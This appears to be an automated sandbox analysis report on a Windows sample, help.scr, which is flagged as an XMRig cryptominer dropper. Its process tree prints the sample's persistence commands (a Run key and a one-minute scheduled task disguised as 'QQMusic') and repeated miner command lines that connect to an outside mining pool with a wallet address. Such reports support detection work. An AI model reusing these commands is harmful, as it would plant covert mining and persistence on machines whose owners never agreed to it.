Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
14-06-2024 17:41
Static task
static1
Behavioral task
behavioral1
Sample
help.scr
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
help.scr
Resource
win10v2004-20240508-en
General
-
Target
help.scr
-
Size
9.0MB
-
MD5
2d927fdb462570728a981443bf36d19f
-
SHA1
eb4f351d937729b14a196bf228ba12a2ff07e73e
-
SHA256
d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239
-
SHA512
efdf3b568fa07d67bb89eb8880c5140653321f9267c771045d1c7be6a6e88fd680059b779d2e4da497e0a88ff1e9adac6e293bb254e5c4dda776aafd518097c9
-
SSDEEP
196608:rhHMBGC3PtXtT+Was8/wq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G02wuwasMdJOnZKVSaaNZOn
Malware Config
Signatures
-
XMRig Miner payload 21 IoCs
Processes:
resource yara_rule behavioral2/memory/4452-132-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/4452-138-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/2688-142-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/4304-148-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/4304-150-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/2892-153-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/4552-157-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/5908-161-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/6068-165-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/4436-169-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/5980-173-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/1348-180-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/3020-184-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/3084-188-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/6036-200-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/3028-204-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/6108-207-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/6108-208-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/5096-211-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/5832-214-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig behavioral2/memory/5832-215-0x00007FF78FA00000-0x00007FF790044000-memory.dmp xmrig -
Executes dropped EXE 21 IoCs
Processes:
spreadTpqrst.exeSMB.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exepid process 4452 spreadTpqrst.exe 3948 SMB.exe 2688 spreadTpqrst.exe 4304 spreadTpqrst.exe 2892 spreadTpqrst.exe 4552 spreadTpqrst.exe 5908 spreadTpqrst.exe 6068 spreadTpqrst.exe 4436 spreadTpqrst.exe 5980 spreadTpqrst.exe 6104 spreadTpqrst.exe 5984 spreadTpqrst.exe 1348 spreadTpqrst.exe 3020 spreadTpqrst.exe 3084 spreadTpqrst.exe 6036 spreadTpqrst.exe 3028 spreadTpqrst.exe 6108 spreadTpqrst.exe 5096 spreadTpqrst.exe 5832 spreadTpqrst.exe 1100 spreadTpqrst.exe -
Processes:
resource yara_rule C:\ProgramData\spreadTpqrst.exe upx behavioral2/memory/4452-8-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/4452-132-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/4452-138-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/2688-142-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/4304-148-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/4304-150-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/2892-153-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/4552-157-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/5908-161-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/6068-165-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/4436-169-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/5980-173-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/6104-176-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/1348-180-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/3020-184-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/3084-188-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/6036-200-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/3028-204-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/6108-207-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/6108-208-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/5096-211-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/5832-214-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/5832-215-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx behavioral2/memory/1100-218-0x00007FF78FA00000-0x00007FF790044000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
help.scrdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\help.scr" help.scr Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\help.scr" help.scr -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
help.scrdescription ioc process File opened (read-only) \??\K: help.scr -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
help.scrdescription ioc process File opened (read-only) \??\VBoxMiniRdrDN help.scr -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
help.scrdescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 help.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz help.scr -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exepid process 4180 ipconfig.exe 4628 ipconfig.exe 5844 ipconfig.exe 4396 ipconfig.exe 5832 ipconfig.exe 3344 ipconfig.exe -
Kills process with taskkill 11 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5820 taskkill.exe 5824 taskkill.exe 1468 taskkill.exe 6096 taskkill.exe 5972 taskkill.exe 668 taskkill.exe 5892 taskkill.exe 6112 taskkill.exe 1236 taskkill.exe 2160 taskkill.exe 1856 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
help.scrpid process 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr 3756 help.scr -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
help.scrpid process 3756 help.scr -
Suspicious use of AdjustPrivilegeToken 55 IoCs
Processes:
help.scrtaskkill.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exedescription pid process Token: SeDebugPrivilege 3756 help.scr Token: SeBackupPrivilege 3756 help.scr Token: SeSecurityPrivilege 3756 help.scr Token: SeSecurityPrivilege 3756 help.scr Token: SeBackupPrivilege 3756 help.scr Token: SeSecurityPrivilege 3756 help.scr Token: SeBackupPrivilege 3756 help.scr Token: SeSecurityPrivilege 3756 help.scr Token: SeBackupPrivilege 3756 help.scr Token: SeSecurityPrivilege 3756 help.scr Token: SeDebugPrivilege 2160 taskkill.exe Token: SeLockMemoryPrivilege 4452 spreadTpqrst.exe Token: SeLockMemoryPrivilege 4452 spreadTpqrst.exe Token: SeDebugPrivilege 1468 taskkill.exe Token: SeLockMemoryPrivilege 2688 spreadTpqrst.exe Token: SeLockMemoryPrivilege 2688 spreadTpqrst.exe Token: SeLockMemoryPrivilege 4304 spreadTpqrst.exe Token: SeLockMemoryPrivilege 4304 spreadTpqrst.exe Token: SeLockMemoryPrivilege 2892 spreadTpqrst.exe Token: SeLockMemoryPrivilege 2892 spreadTpqrst.exe Token: SeDebugPrivilege 1856 taskkill.exe Token: SeLockMemoryPrivilege 4552 spreadTpqrst.exe Token: SeLockMemoryPrivilege 4552 spreadTpqrst.exe Token: SeDebugPrivilege 5972 taskkill.exe Token: SeLockMemoryPrivilege 5908 spreadTpqrst.exe Token: SeLockMemoryPrivilege 5908 spreadTpqrst.exe Token: SeLockMemoryPrivilege 6068 spreadTpqrst.exe Token: SeLockMemoryPrivilege 6068 spreadTpqrst.exe Token: SeDebugPrivilege 668 taskkill.exe Token: SeLockMemoryPrivilege 4436 spreadTpqrst.exe Token: SeLockMemoryPrivilege 4436 spreadTpqrst.exe Token: SeLockMemoryPrivilege 5980 spreadTpqrst.exe Token: SeLockMemoryPrivilege 5980 spreadTpqrst.exe Token: SeDebugPrivilege 5892 taskkill.exe Token: SeDebugPrivilege 6096 taskkill.exe Token: SeLockMemoryPrivilege 1348 spreadTpqrst.exe Token: SeLockMemoryPrivilege 1348 spreadTpqrst.exe Token: SeLockMemoryPrivilege 3020 spreadTpqrst.exe Token: SeLockMemoryPrivilege 3020 spreadTpqrst.exe Token: SeDebugPrivilege 5820 taskkill.exe Token: SeLockMemoryPrivilege 3084 spreadTpqrst.exe Token: SeLockMemoryPrivilege 3084 spreadTpqrst.exe Token: SeLockMemoryPrivilege 6036 spreadTpqrst.exe Token: SeLockMemoryPrivilege 6036 spreadTpqrst.exe Token: SeDebugPrivilege 6112 taskkill.exe Token: SeLockMemoryPrivilege 3028 spreadTpqrst.exe Token: SeLockMemoryPrivilege 3028 spreadTpqrst.exe Token: SeLockMemoryPrivilege 6108 spreadTpqrst.exe Token: SeLockMemoryPrivilege 6108 spreadTpqrst.exe Token: SeDebugPrivilege 5824 taskkill.exe Token: SeLockMemoryPrivilege 5096 spreadTpqrst.exe Token: SeLockMemoryPrivilege 5096 spreadTpqrst.exe Token: SeLockMemoryPrivilege 5832 spreadTpqrst.exe Token: SeLockMemoryPrivilege 5832 spreadTpqrst.exe Token: SeDebugPrivilege 1236 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
help.scrcmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3756 wrote to memory of 4904 3756 help.scr cmd.exe PID 3756 wrote to memory of 4904 3756 help.scr cmd.exe PID 3756 wrote to memory of 4904 3756 help.scr cmd.exe PID 3756 wrote to memory of 1492 3756 help.scr cmd.exe PID 3756 wrote to memory of 1492 3756 help.scr cmd.exe PID 3756 wrote to memory of 1492 3756 help.scr cmd.exe PID 4904 wrote to memory of 536 4904 cmd.exe schtasks.exe PID 4904 wrote to memory of 536 4904 cmd.exe schtasks.exe PID 4904 wrote to memory of 536 4904 cmd.exe schtasks.exe PID 1492 wrote to memory of 2160 1492 cmd.exe taskkill.exe PID 1492 wrote to memory of 2160 1492 cmd.exe taskkill.exe PID 1492 wrote to memory of 2160 1492 cmd.exe taskkill.exe PID 3756 wrote to memory of 4968 3756 help.scr cmd.exe PID 3756 wrote to memory of 4968 3756 help.scr cmd.exe PID 3756 wrote to memory of 4968 3756 help.scr cmd.exe PID 4968 wrote to memory of 4180 4968 cmd.exe ipconfig.exe PID 4968 wrote to memory of 4180 4968 cmd.exe ipconfig.exe PID 4968 wrote to memory of 4180 4968 cmd.exe ipconfig.exe PID 3756 wrote to memory of 4452 3756 help.scr spreadTpqrst.exe PID 3756 wrote to memory of 4452 3756 help.scr spreadTpqrst.exe PID 3756 wrote to memory of 3948 3756 help.scr SMB.exe PID 3756 wrote to memory of 3948 3756 help.scr SMB.exe PID 3756 wrote to memory of 3948 3756 help.scr SMB.exe PID 3756 wrote to memory of 2772 3756 help.scr cmd.exe PID 3756 wrote to memory of 2772 3756 help.scr cmd.exe PID 3756 wrote to memory of 2772 3756 help.scr cmd.exe PID 3756 wrote to memory of 2688 3756 help.scr spreadTpqrst.exe PID 3756 wrote to memory of 2688 3756 help.scr spreadTpqrst.exe PID 2772 wrote to memory of 1468 2772 cmd.exe taskkill.exe PID 2772 wrote to memory of 1468 2772 cmd.exe taskkill.exe PID 2772 wrote to memory of 1468 2772 cmd.exe taskkill.exe PID 3756 wrote to memory of 4304 3756 help.scr spreadTpqrst.exe PID 3756 wrote to memory of 4304 3756 help.scr spreadTpqrst.exe PID 3756 wrote to memory of 1004 3756 help.scr cmd.exe PID 3756 wrote to memory of 1004 3756 help.scr cmd.exe PID 3756 wrote to memory of 1004 3756 help.scr cmd.exe PID 1004 wrote to memory of 4628 1004 cmd.exe ipconfig.exe PID 1004 wrote to memory of 4628 1004 cmd.exe ipconfig.exe PID 1004 wrote to memory of 4628 1004 cmd.exe ipconfig.exe PID 3756 wrote to memory of 1324 3756 help.scr cmd.exe PID 3756 wrote to memory of 1324 3756 help.scr cmd.exe PID 3756 wrote to memory of 1324 3756 help.scr cmd.exe PID 3756 wrote to memory of 2892 3756 help.scr spreadTpqrst.exe PID 3756 wrote to memory of 2892 3756 help.scr spreadTpqrst.exe PID 1324 wrote to memory of 1856 1324 cmd.exe taskkill.exe PID 1324 wrote to memory of 1856 1324 cmd.exe taskkill.exe PID 1324 wrote to memory of 1856 1324 cmd.exe taskkill.exe PID 3756 wrote to memory of 4552 3756 help.scr spreadTpqrst.exe PID 3756 wrote to memory of 4552 3756 help.scr spreadTpqrst.exe PID 3756 wrote to memory of 5792 3756 help.scr cmd.exe PID 3756 wrote to memory of 5792 3756 help.scr cmd.exe PID 3756 wrote to memory of 5792 3756 help.scr cmd.exe PID 5792 wrote to memory of 5844 5792 cmd.exe ipconfig.exe PID 5792 wrote to memory of 5844 5792 cmd.exe ipconfig.exe PID 5792 wrote to memory of 5844 5792 cmd.exe ipconfig.exe PID 3756 wrote to memory of 5872 3756 help.scr cmd.exe PID 3756 wrote to memory of 5872 3756 help.scr cmd.exe PID 3756 wrote to memory of 5872 3756 help.scr cmd.exe PID 3756 wrote to memory of 5908 3756 help.scr spreadTpqrst.exe PID 3756 wrote to memory of 5908 3756 help.scr spreadTpqrst.exe PID 5872 wrote to memory of 5972 5872 cmd.exe taskkill.exe PID 5872 wrote to memory of 5972 5872 cmd.exe taskkill.exe PID 5872 wrote to memory of 5972 5872 cmd.exe taskkill.exe PID 3756 wrote to memory of 6068 3756 help.scr spreadTpqrst.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\help.scr"C:\Users\Admin\AppData\Local\Temp\help.scr" /S1⤵
- Adds Run key to start application
- Enumerates connected drives
- Checks for VirtualBox DLLs, possible anti-VM trick
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\help.scr /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\help.scr /F3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spreadTpqrst.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spreadTpqrst.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\SMB.exeC:\ProgramData\SMB.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spreadTpqrst.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spreadTpqrst.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spreadTpqrst.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spreadTpqrst.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spreadTpqrst.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spreadTpqrst.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spreadTpqrst.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spreadTpqrst.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spreadTpqrst.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spreadTpqrst.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spreadTpqrst.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spreadTpqrst.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spreadTpqrst.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spreadTpqrst.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im spreadTpqrst.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spreadTpqrst.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\spreadTpqrst.exeC:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
